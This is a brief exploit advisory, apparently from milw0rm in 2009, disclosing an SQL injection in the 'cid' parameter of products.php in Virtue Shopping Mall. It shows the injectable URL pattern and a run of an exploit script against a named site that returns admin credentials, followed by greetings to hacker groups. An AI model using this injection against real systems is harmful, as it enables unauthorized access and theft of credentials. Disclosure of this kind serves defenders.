CMS : Virtue Shopping Mall WEB : http://www.virtuenetz.com/mall/ Archivo : products.php Variable Tipo : GET valor : cid Tipo : SQL Injection URL : http://www.site.com/products.php?cid=[SQLI] Exploit : undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/ ID :1 Usuario : admin Password : admin Gretz : C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net. 100% CHILE WWW.UNDERSECURITY.NET # milw0rm.com [2009-06-08]